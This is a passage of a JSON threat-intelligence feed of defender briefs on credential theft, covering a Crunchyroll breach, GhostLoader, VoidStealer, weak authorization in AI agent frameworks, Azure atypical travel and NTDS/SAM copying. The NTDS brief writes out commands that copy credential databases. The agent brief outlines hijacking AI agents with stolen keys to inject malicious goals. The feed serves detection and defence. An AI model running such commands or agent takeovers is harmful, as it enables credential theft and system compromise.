theft (TA0006).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party vendors and partners to ensure they meet the required security standards (TA0011).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the use of stolen Okta credentials based on anomalous login patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-crunchyroll-breach/","summary":"Crunchyroll suffered a data breach after a Telus employee was phished, leading to Okta credential theft and exfiltration of 100GB of customer data.","title":"Crunchyroll Data Breach via Telus Supply Chain Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-crunchyroll-breach/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["github","malware","macos","credential-theft","ai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eGhostLoader is a malware campaign observed using GitHub repositories and AI-assisted development workflows to deliver malicious payloads specifically designed to steal credentials from macOS systems. The threat leverages the trust associated with software repositories and the increasing adoption of AI tools in development to potentially bypass security measures. While the exact start date of the campaign is not specified, the report from Jamf highlights its recent emergence as a notable threat. Defenders should prioritize monitoring for suspicious activity related to GitHub repositories and unusual AI-driven development processes. The targeted scope appears to be macOS users who engage with software development resources and AI-related tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker creates a seemingly legitimate software repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe repository contains a project with files that may appear benign or related to AI workflows.\u003c/li\u003e\n\u003cli\u003eA malicious script or binary, named GhostLoader, is included within the repository or downloaded as a dependency.\u003c/li\u003e\n\u003cli\u003eA user downloads or clones the repository, potentially enticed by AI-assisted development features or other seemingly useful functionality.\u003c/li\u003e\n\u003cli\u003eThe user executes the GhostLoader script or binary on their macOS system.\u003c/li\u003e\n\u003cli\u003eGhostLoader executes, initiating the credential-stealing process.\u003c/li\u003e\n\u003cli\u003eStolen credentials are collected and potentially exfiltrated to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to user accounts or sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe GhostLoader malware directly targets macOS systems and focuses on credential theft. Successful attacks can lead to unauthorized access to sensitive user accounts, intellectual property, and confidential data. The number of victims and specific sectors targeted remain unclear, but the use of GitHub and AI workflows suggests a focus on developers or users involved in AI-related activities. The compromise of credentials can have severe consequences, including financial loss, data breaches, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events on macOS for execution of unusual or unsigned binaries in user directories, potentially indicative of GhostLoader execution (see process creation rule).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect connections to known malicious infrastructure or unusual data exfiltration patterns after the execution of scripts from cloned GitHub repositories.\u003c/li\u003e\n\u003cli\u003eEducate developers and users about the risks of downloading and executing code from untrusted sources, particularly those related to AI-assisted workflows.\u003c/li\u003e\n\u003cli\u003eEnable and review macOS system logs for suspicious activity related to credential access and keychain modifications.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-21T13:03:03Z","date_published":"2026-03-21T13:03:03Z","id":"/briefs/2024-01-ghostloader/","summary":"GhostLoader malware leverages GitHub repositories and AI-assisted development workflows to distribute credential-stealing payloads targeting macOS systems.","title":"GhostLoader Malware Targeting macOS via GitHub and AI Workflows","url":"https://feed.craftedsignal.io/briefs/2024-01-ghostloader/"},{"_cs_actors":["VoidStealer"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["credential-theft","chrome","debugging"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eVoidStealer is a threat actor utilizing advanced techniques to extract sensitive information from Google Chrome. This is achieved by abusing Chrome\u0026rsquo;s built-in debugging features. The threat actor\u0026rsquo;s primary goal is to steal credentials, session cookies, and potentially other sensitive data stored within the browser\u0026rsquo;s memory. This allows for account takeover and lateral movement within compromised environments. The technique bypasses traditional security measures, as it operates within a legitimate browser process. This activity started being discussed in open source forums around March 2026 and represents a sophisticated approach to browser credential theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an unspecified method (e.g., malware distribution, social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker deploys VoidStealer, a custom tool or script designed to interface with Chrome\u0026rsquo;s debugging API.\u003c/li\u003e\n\u003cli\u003eVoidStealer identifies running Chrome processes and attaches itself as a debugger.\u003c/li\u003e\n\u003cli\u003eThe tool leverages the debugging interface to inspect Chrome\u0026rsquo;s memory space.\u003c/li\u003e\n\u003cli\u003eVoidStealer searches for specific data structures and memory regions known to store credentials, session cookies, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker extracts the targeted data from Chrome\u0026rsquo;s memory.\u003c/li\u003e\n\u003cli\u003eStolen data is exfiltrated to a command-and-control server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials and session cookies for account takeover, lateral movement, and potentially data exfiltration from other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful VoidStealer attacks can lead to significant data breaches, account takeovers, and financial losses. Organizations in any sector are at risk, especially those that heavily rely on web-based applications and services. The compromise of user credentials allows attackers to gain unauthorized access to sensitive corporate resources, intellectual property, and customer data. If successful, this can also lead to follow-on attacks, such as ransomware deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for unexpected tools attaching to Chrome processes as debuggers to identify potential VoidStealer activity. Deploy the \u0026ldquo;Suspicious Chrome Debugging Attachment\u0026rdquo; Sigma rule to your SIEM.\u003c/li\u003e\n\u003cli\u003eImplement strict process whitelisting policies to prevent unauthorized applications from running on endpoints.\u003c/li\u003e\n\u003cli\u003eEnable and review Chrome\u0026rsquo;s built-in security features, such as password protection and safe browsing, to mitigate the risk of credential theft.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of downloading and executing untrusted software.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:48:21Z","date_published":"2026-03-20T05:48:21Z","id":"/briefs/2024-01-23-voidstealer-chrome-debugging/","summary":"VoidStealer leverages Chrome debugging capabilities to extract sensitive information, such as credentials and session cookies, directly from the browser's memory.","title":"VoidStealer Steals Secrets by Debugging Chrome","url":"https://feed.craftedsignal.io/briefs/2024-01-23-voidstealer-chrome-debugging/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["ai-agent","api-key","authorization","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA recent audit of 30 popular AI agent frameworks, including OpenClaw, AutoGen, CrewAI, LangGraph, MetaGPT, and AutoGPT, reveals a widespread lack of robust authorization mechanisms. The report, published in March 2026, highlights that 93% of these frameworks rely solely on unscoped API keys for authentication. This means that any agent with access to the API key has full privileges, creating significant security risks. Furthermore, none of the frameworks provide per-agent cryptographic identity or revocation capabilities. In multi-agent systems, child agents inherit the full credentials of their parent agents, with no option for scope narrowing. This lack of granular control and isolation can lead to significant security breaches, including credential exposure and privilege escalation, as demonstrated by the 21,000 exposed OpenClaw instances leaking credentials and the 1.5 million API tokens exposed in the Moltbook breach.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to an unscoped API key, either through exposed instances like the 21,000 OpenClaw instances or breaches like the Moltbook incident affecting 1.5 million tokens.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the unscoped API key to authenticate to the AI agent framework.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the API key to control an AI agent, potentially injecting malicious goals or code.\u003c/li\u003e\n\u003cli\u003eIn multi-agent systems, the attacker exploits the inherited privileges of child agents to gain broader access.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the agent\u0026rsquo;s capabilities to access sensitive data or perform unauthorized actions.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges by exploiting vulnerabilities within the agent framework or underlying system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised agent to move laterally within the system or network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which could include data theft, system disruption, or further compromise of the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe widespread use of unscoped API keys and lack of proper authorization in AI agent frameworks creates a significant security risk. Successful exploitation can lead to data breaches, system compromise, and reputational damage. The report cites real-world incidents, including 21,000 exposed OpenClaw instances leaking credentials and 1.5 million API tokens exposed in the Moltbook breach, demonstrating the potential for widespread impact. The lack of per-agent revocation means that if one agent is compromised, the API key for all agents must be rotated, causing significant disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement network monitoring to detect unusual traffic patterns originating from AI agent servers. Analyze outbound connections for connections to unusual or malicious domains (grantex.dev).\u003c/li\u003e\n\u003cli\u003eAudit the configuration of AI agent frameworks to identify instances using unscoped API keys. Prioritize upgrading or replacing frameworks that lack proper authorization controls.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for detecting API key usage in command-line arguments or environment variables to identify potential credential exposure.\u003c/li\u003e\n\u003cli\u003eMonitor for access to sensitive data or resources by AI agents and implement least-privilege access controls.\u003c/li\u003e\n\u003cli\u003eImplement regular security audits and penetration testing of AI agent frameworks to identify and address vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T12:00:00Z","date_published":"2026-03-16T12:00:00Z","id":"/briefs/2026-03-ai-agent-auth/","summary":"A research report auditing popular AI agent projects found that 93% rely on unscoped API keys as the only authentication mechanism, leading to potential credential exposure, privilege escalation, and lateral movement within multi-agent systems.","title":"Unscoped API Keys in AI Agent Frameworks","url":"https://feed.craftedsignal.io/briefs/2026-03-ai-agent-auth/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Azure Active Directory","Microsoft Entra ID Protection"],"_cs_severities":["high"],"_cs_tags":["azure","identity-protection","atypical-travel","account-compromise","credential-theft"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Atypical Travel detection in Azure Identity Protection is designed to identify instances where a user signs in from two geographically distant locations within a time frame that makes legitimate travel improbable. This anomaly indicates that an attacker may have compromised a user\u0026rsquo;s credentials and is attempting to access resources from a different location. The alert is triggered by the \u0026lsquo;unlikelyTravel\u0026rsquo; risk event type within Azure\u0026rsquo;s risk detection service. This capability helps defenders identify compromised accounts and prevent further damage such as data exfiltration or lateral movement within the environment. The detection is based on comparing current sign-in locations against the user\u0026rsquo;s historical sign-in patterns, making it more accurate and less prone to false positives compared to simple geo-location based alerts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Compromise:\u003c/strong\u003e An attacker obtains a user\u0026rsquo;s credentials through phishing, credential stuffing, or malware.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access (Location A):\u003c/strong\u003e The attacker uses the compromised credentials to sign in from a location that may be atypical for the user.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSuccessful Authentication (Location A):\u003c/strong\u003e The attacker successfully authenticates and gains access to Azure resources.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation (Optional):\u003c/strong\u003e If the compromised account has sufficient permissions, the attacker attempts to escalate privileges within the Azure environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Optional):\u003c/strong\u003e The attacker uses the compromised account to move laterally to other resources or accounts within the Azure environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSecond Sign-in (Location B):\u003c/strong\u003e Within a short timeframe, the attacker (or another attacker using the same credentials) signs in from a geographically distant location (Location B).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAtypical Travel Alert:\u003c/strong\u003e Azure Identity Protection detects the unlikely travel scenario based on the two geographically improbable sign-ins.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResource Access/Data Exfiltration:\u003c/strong\u003e The attacker accesses sensitive resources or exfiltrates data from the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful Atypical Travel attack can lead to unauthorized access to sensitive data, privilege escalation, lateral movement within the Azure environment, and potentially data exfiltration. The number of victims depends on the scope of the compromised user\u0026rsquo;s access and the attacker\u0026rsquo;s objectives. Organizations in all sectors are potentially at risk, as attackers often target user accounts with elevated privileges or access to critical data. The financial impact can include the cost of incident response, data breach notifications, and potential regulatory fines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect Atypical Travel events (logsource: azure, service: riskdetection).\u003c/li\u003e\n\u003cli\u003eInvestigate flagged sessions in the context of other sign-ins from the user, as suggested by the false positives guidance.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all users to mitigate the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eReview and enforce conditional access policies to restrict access based on location and other factors.\u003c/li\u003e\n\u003cli\u003eMonitor user accounts for unusual activity, such as changes in sign-in patterns or resource access.\u003c/li\u003e\n\u003cli\u003eImplement account lockout policies to prevent brute-force attacks against user accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T18:21:00Z","date_published":"2024-01-02T18:21:00Z","id":"/briefs/2024-01-azure-atypical-travel/","summary":"The Atypical Travel detection in Azure Identity Protection identifies potentially compromised user accounts by detecting geographically improbable sign-in activity, indicative of account compromise or misuse.","title":"Azure Identity Protection Atypical Travel Anomaly","url":"https://feed.craftedsignal.io/briefs/2024-01-azure-atypical-travel/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["high"],"_cs_tags":["credential-access","windows","ntds","sam","credential-theft"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","CrowdStrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies attempts to copy the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM) files on Windows systems. These files contain highly sensitive information, including hashed domain and local credentials, and their unauthorized duplication can lead to significant credential compromise. The detection focuses on identifying specific command-line operations associated with copying these files, including the use of utilities like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, and \u003ccode\u003eesentutl.exe\u003c/code\u003e. The rule is designed for data generated by Elastic Defend and also supports third-party data sources like CrowdStrike, Microsoft Defender XDR, and SentinelOne Cloud Funnel, making it broadly applicable for organizations using these security solutions. The detection is based on observed attacker behaviors documented in reports such as those detailing Pysa/Mespinoza ransomware and techniques used for credential access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker gains initial access to a Windows system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker elevates privileges to gain necessary access to protected system files, possibly using exploits or misconfigurations.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVolume Shadow Copy Creation (Optional):\u003c/strong\u003e The attacker creates a Volume Shadow Copy (VSS) of the system drive to bypass file locking and access the NTDS.dit or SAM files without disrupting system operations. This may involve commands utilizing \u003ccode\u003evssadmin.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNTDS.dit or SAM File Copy:\u003c/strong\u003e The attacker uses command-line tools like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, or \u003ccode\u003eesentutl.exe\u003c/code\u003e to copy the NTDS.dit or SAM files to a different location.  Example commands include \u003ccode\u003ecopy C:\\\\Windows\\\\NTDS\\\\ntds.dit C:\\\\temp\\\\ntds.dit\u003c/code\u003e or \u003ccode\u003eesentutl.exe /y /vss /d\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStaging:\u003c/strong\u003e The copied files are staged in a temporary directory or network share accessible to the attacker.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Extraction:\u003c/strong\u003e The attacker uses tools like Mimikatz or other credential dumping utilities to extract plaintext passwords and hashes from the copied NTDS.dit or SAM files.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement/Domain Dominance:\u003c/strong\u003e  The attacker uses the extracted credentials to move laterally within the network, compromise additional systems, and potentially achieve domain dominance.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration (Optional):\u003c/strong\u003e The attacker may exfiltrate the copied NTDS.dit or SAM file for offline analysis or further exploitation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack involving the copying of NTDS.dit or SAM files can lead to a complete compromise of an organization\u0026rsquo;s Active Directory domain and/or local system credentials. This allows attackers to move laterally through the network, access sensitive data, and disrupt business operations. The impact can range from data breaches and financial losses to reputational damage and regulatory fines. Incidents like the Pysa/Mespinoza ransomware attacks highlight the real-world consequences of this type of credential access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNTDS or SAM Database File Copied\u003c/code\u003e to your SIEM to detect suspicious copy operations involving NTDS.dit or SAM files. Tune the rule based on your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to ensure adequate coverage for the Sigma rules and investigation.\u003c/li\u003e\n\u003cli\u003eMonitor process command lines for the execution of \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, and \u003ccode\u003eesentutl.exe\u003c/code\u003e with arguments related to copying NTDS.dit or SAM files as described in the rule \u003ccode\u003eNTDS or SAM Database File Copied\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate and validate legitimate backup or disaster recovery processes, adding exceptions based on stable \u003ccode\u003eprocess.executable\u003c/code\u003e, \u003ccode\u003eprocess.code_signature.subject_name\u003c/code\u003e, \u003ccode\u003eprocess.parent.executable\u003c/code\u003e, bounded \u003ccode\u003eprocess.command_line\u003c/code\u003e source/destination, \u003ccode\u003euser.id\u003c/code\u003e, and \u003ccode\u003ehost.id\u003c/code\u003e to minimize false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-01T12:00:00Z","date_published":"2024-01-01T12:00:00Z","id":"/briefs/2024-01-01-ntds-sam-copy/","summary":"Detects copy operations of Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files, potentially exposing sensitive hashed credentials on Windows systems.","title":"NTDS or SAM Database File Copied","url":"https://feed.craftedsignal.io/briefs/2024-01-01-ntds-sam-copy/"}],"language":"en","title":"CraftedSignal Threat Feed — Credential-Theft","version":"https://jsonfeed.org/version/1.1"}